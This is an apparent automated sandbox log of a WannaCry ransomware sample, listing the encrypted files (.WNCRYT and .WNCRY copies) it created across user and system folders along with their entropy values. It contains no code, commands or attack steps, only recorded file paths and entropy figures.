Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRYT entropy: 7.99667225364	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{af177fd8-4436-44f8-b660-59b1d73126a6}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99915276593	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRYT entropy: 7.99980236011	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT entropy: 7.99979758511	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT entropy: 7.99980954405	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRYT entropy: 7.99981076356	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT entropy: 7.99995103787	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT entropy: 7.99717928489	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRYT entropy: 7.99981120415	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.WNCRYT entropy: 7.99350021239	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db.WNCRYT entropy: 7.99557760155	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js.WNCRYT entropy: 7.99989300849	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.WNCRYT entropy: 7.99981698632	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.WNCRYT entropy: 7.99996670991	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.WNCRYT entropy: 7.99944843086	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js.WNCRYT entropy: 7.99990468527	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db.WNCRYT entropy: 7.9919911971	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\auto_open_controller.js.WNCRYT entropy: 7.99984680736	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_checkout_page_validator.js.WNCRYT entropy: 7.99980945831	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_confirmation_page_validator.js.WNCRYT entropy: 7.99980433931	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js.WNCRYT entropy: 7.99796552975	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst.WNCRYT entropy: 7.99938330998	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst entropy: 7.99936049417	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js.WNCRYT entropy: 7.99296514252	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js.WNCRYT entropy: 7.99987320722	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.WNCRYT entropy: 7.99179820112	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js.WNCRYT entropy: 7.99993516154	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.WNCRYT entropy: 7.9998146213	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.WNCRYT entropy: 7.99945141835	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\90SNK17T\oneDs_f2e0f4a029670f10d892[1].js.WNCRYT entropy: 7.99892723077	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRYT entropy: 7.99991754674	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg.WNCRYT entropy: 7.99835426884	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg.WNCRYT entropy: 7.99851263398	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRYT entropy: 7.99965845055	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRYT entropy: 7.99932905589	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRYT entropy: 7.9973129998	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js.WNCRYT entropy: 7.99967918879	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js.WNCRYT entropy: 7.99947262569	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.WNCRYT entropy: 7.99964975052	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.WNCRYT entropy: 7.99987765465	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{0DD3376E-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRYT entropy: 7.99957958013	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db.WNCRYT entropy: 7.9983459791	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.WNCRYT entropy: 7.99812105656	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db.WNCRYT entropy: 7.9974522948	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2[1].js.WNCRYT entropy: 7.99953428626	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2[1].js.WNCRYT entropy: 7.99954127492	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133670573500972363.txt.WNCRYT entropy: 7.99824658014	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{4d2e6c03-f928-4873-b576-0d6ef01dade1}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99500003604	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133670573801262804.txt.WNCRYT entropy: 7.99857717813	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\Desktop\s.wnry entropy: 7.998263053	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\Desktop\t.wnry entropy: 7.99727613788	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Diagnosis\EventStore.db.WNCRYT entropy: 7.99828574008	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT entropy: 7.9996186358	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.WNCRYT entropy: 7.99968212002	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\User Account Pictures\user.bmp.WNCRYT entropy: 7.99968643479	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db.WNCRYT entropy: 7.99966175336	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.WNCRYT entropy: 7.99490715243	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.WNCRYT entropy: 7.99372596882	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\tmp.edb.WNCRYT entropy: 7.998858371	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRYT entropy: 7.9999893887	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.WNCRYT entropy: 7.99900248421	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-GB\WelcomeFax.tif.WNCRYT entropy: 7.99786862827	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT entropy: 7.99547941422	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT entropy: 7.99358265733	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\3DD78803-01DE-4232-A9F6-781F290BD1C3\operations.db.WNCRYT entropy: 7.99998172112	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT entropy: 7.99855139033	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT entropy: 7.9957254928	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt.WNCRYT entropy: 7.99357100081	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.WNCRYT entropy: 7.99771673854	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT entropy: 7.99973282051	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\hero-image-desktop-f6720a4145[1].jpg.WNCRYT entropy: 7.9988084607	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst.WNCRY (copy) entropy: 7.99938330998	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy) entropy: 7.9996186358	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\acrobat_sbx\acroNGLLog.txt.WNCRY (copy) entropy: 7.99357100081	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.WNCRY (copy) entropy: 7.99771673854	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRY (copy) entropy: 7.99973282051	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\hero-image-desktop-f6720a4145[1].jpg.WNCRY (copy) entropy: 7.9988084607	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133517913551623871.txt.WNCRY (copy) entropy: 7.99838018207	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133517913644287936.txt.WNCRY (copy) entropy: 7.99841379748	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133670572901062730.txt.WNCRY (copy) entropy: 7.99835979529	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133670573200963839.txt.WNCRY (copy) entropy: 7.99834486559	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsconversions.txt.WNCRY (copy) entropy: 7.99986852516	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsglobals.txt.WNCRY (copy) entropy: 7.99953769714	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appssynonyms.txt.WNCRY (copy) entropy: 7.99916425913	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingsglobals.txt.WNCRY (copy) entropy: 7.99565628894	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2ba3710e-bf6a-46ef-97ed-2efbb606e519}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99524574722	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{40385465-94d7-4db6-a4cb-fc8229e20afa}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99533445436	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c7a88677-8220-45ae-8b75-3e4ab11a6127}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99456911503	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingsconversions.txt.WNCRY (copy) entropy: 7.99965139689	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingssynonyms.txt.WNCRY (copy) entropy: 7.99856196947	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{615928dd-022f-4339-b734-9a8a7fd59f58}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99917561682	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{af177fd8-4436-44f8-b660-59b1d73126a6}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99915276593	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.WNCRY (copy) entropy: 7.99179820112	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Temp\80.WNCRYT (copy) entropy: 7.99936049417	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133670573500972363.txt.WNCRY (copy) entropy: 7.99824658014	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{4d2e6c03-f928-4873-b576-0d6ef01dade1}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99500003604	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Users\user\AppData\Local\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133670573801262804.txt.WNCRY (copy) entropy: 7.99857717813	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Diagnosis\EventStore.db.WNCRY (copy) entropy: 7.99828574008	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\User Account Pictures\guest.bmp.WNCRY (copy) entropy: 7.99968212002	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\User Account Pictures\user.bmp.WNCRY (copy) entropy: 7.99968643479	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Scans\mpenginedb.db.WNCRY (copy) entropy: 7.99966175336	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.WNCRY (copy) entropy: 7.99490715243	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.WNCRY (copy) entropy: 7.99372596882	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\tmp.edb.WNCRY (copy) entropy: 7.998858371	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRY (copy) entropy: 7.9999893887	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.WNCRY (copy) entropy: 7.99900248421	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSFax\VirtualInbox\en-GB\WelcomeFax.tif.WNCRY (copy) entropy: 7.99786862827	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRY (copy) entropy: 7.99547941422	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRY (copy) entropy: 7.99358265733	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\ClickToRun\ProductReleases\3DD78803-01DE-4232-A9F6-781F290BD1C3\operations.db.WNCRY (copy) entropy: 7.99998172112	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRY (copy) entropy: 7.99855139033	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRY (copy) entropy: 7.9957254928	Jump to dropped file
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRY (copy) entropy: 7.99852818991	Jump to dropped file
